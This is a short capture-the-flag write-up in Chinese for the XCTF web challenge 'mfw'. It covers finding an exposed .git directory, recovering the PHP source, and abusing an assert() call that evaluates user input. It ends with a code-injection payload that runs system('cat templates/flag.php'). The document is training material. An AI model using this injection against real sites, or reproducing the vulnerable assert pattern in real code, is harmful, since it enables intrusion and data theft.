攻防世界-web-高手進階區015-mfw

1.查看頁面，發現網站使用的一些東西

 

 

 

2.存在.git目錄

 

 

 

3.使用 GitHack獲取源碼

 

 

 

4.index.php中關鍵代碼以下

<?php

if (isset($_GET['page'])) {

    $page = $_GET['page'];} else {

    $page = "home";}

$file = "templates/" . $page . ".php";

// I heard '..' is dangerous!assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");

 

若是這個字符串中沒有找到相應的子字符串 就返回false//

TODO: Make this look niceassert("file_exists('$file')") or die("That file doesn't exist!");

?>

其中：

assert() 檢查一個斷言是否爲 FALSE

strpos() 函數查找字符串在另外一字符串中第一次出現的位置。若是沒有找到則返回False

file_exists() 函數檢查文件或目錄是否存在。

assert()函數會將括號中的字符當成代碼來執行，並返回true或false。

 

5.構造payload

?page=abc') or system("cat templates/flag.php");//